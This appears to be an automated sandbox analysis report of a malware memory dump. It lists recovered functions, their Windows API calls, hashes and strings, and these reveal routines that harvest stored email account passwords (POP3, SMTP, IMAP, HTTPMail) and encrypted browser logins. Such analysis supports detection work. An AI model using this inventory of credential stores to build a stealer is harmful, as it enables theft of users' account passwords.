                                          Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                          Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                          • _strcmpi.MSVCRT ref: 0040CEC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: strlen$_strcmpimemset
                                          • String ID: /stext
                                          • API String ID: 520177685-3817206916
                                          • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                          • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                          Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                          Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                          Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                          • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID:
                                          • API String ID: 145871493-0
                                          • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                          • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                          Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                          • String ID:
                                          • API String ID: 4165544737-0
                                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                          Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                          Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                          Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                          Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                          • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                          • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                          • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                          Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                          Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                          • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                          • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                          • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                          Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                          Non-executed Functions

                                          Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                          • API String ID: 2238633743-192783356
                                          • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                          • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                          • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                          • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                          Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString_mbscmpstrlen
                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                          • API String ID: 3963849919-1658304561
                                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                          Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@??3@memcpymemset
                                          • String ID: (yE$(yE$(yE
                                          • API String ID: 1865533344-362086290
                                          • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                          • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                          • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                          • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                          Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040EBD8
                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                          • memset.MSVCRT ref: 0040EC2B
                                          • memset.MSVCRT ref: 0040EC47
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                          • memset.MSVCRT ref: 0040ECDD
                                          • memset.MSVCRT ref: 0040ECF2
                                          • _mbscpy.MSVCRT ref: 0040ED59
                                          • _mbscpy.MSVCRT ref: 0040ED6F
                                          • _mbscpy.MSVCRT ref: 0040ED85
                                          • _mbscpy.MSVCRT ref: 0040ED9B
                                          • _mbscpy.MSVCRT ref: 0040EDB1
                                          • _mbscpy.MSVCRT ref: 0040EDC7
                                          • memset.MSVCRT ref: 0040EDE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                          • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                          • API String ID: 3137614212-1455797042
                                          • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                          • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                          • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                          • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                          Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                          • memset.MSVCRT ref: 0040E5B8
                                          • memset.MSVCRT ref: 0040E5CD
                                          • _mbscpy.MSVCRT ref: 0040E634
                                          • _mbscpy.MSVCRT ref: 0040E64A
                                          • _mbscpy.MSVCRT ref: 0040E660
                                          • _mbscpy.MSVCRT ref: 0040E676
                                          • _mbscpy.MSVCRT ref: 0040E68C
                                          • _mbscpy.MSVCRT ref: 0040E69F
                                          • memset.MSVCRT ref: 0040E6B5
                                          • memset.MSVCRT ref: 0040E6CC
                                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                            • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                          • memset.MSVCRT ref: 0040E736
                                          • memset.MSVCRT ref: 0040E74F
                                          • sprintf.MSVCRT ref: 0040E76D
                                          • sprintf.MSVCRT ref: 0040E788
                                          • _strcmpi.MSVCRT ref: 0040E79E
                                          • _strcmpi.MSVCRT ref: 0040E7B7
                                          • _strcmpi.MSVCRT ref: 0040E7D3
                                          • memset.MSVCRT ref: 0040E858
                                          • sprintf.MSVCRT ref: 0040E873
                                          • _strcmpi.MSVCRT ref: 0040E889
                                          • _strcmpi.MSVCRT ref: 0040E8A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                          • API String ID: 4171719235-3943159138
                                          • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                          • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                          Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                          • GetWindowRect.USER32(?,?), ref: 00410487
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                          • GetDC.USER32 ref: 004104E2
                                          • strlen.MSVCRT ref: 00410522
                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                          • ReleaseDC.USER32(?,?), ref: 00410580
                                          • sprintf.MSVCRT ref: 00410640
                                          • SetWindowTextA.USER32(?,?), ref: 00410654
                                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                          • GetClientRect.USER32(?,?), ref: 004106DD
                                          • GetWindowRect.USER32(?,?), ref: 004106E7
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                          • GetClientRect.USER32(?,?), ref: 00410737
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                          • String ID: %s:$EDIT$STATIC
                                          • API String ID: 1703216249-3046471546
                                          • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                          • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                          Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004024F5
                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                          • _mbscpy.MSVCRT ref: 00402533
                                          • _mbscpy.MSVCRT ref: 004025FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy$QueryValuememset
                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                          • API String ID: 168965057-606283353
                                          • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                          • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                          Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00402869
                                            • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                          • _mbscpy.MSVCRT ref: 004028A3
                                            • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                          • _mbscpy.MSVCRT ref: 0040297B
                                            • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                          • API String ID: 1497257669-167382505
                                          • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                          • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                          • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
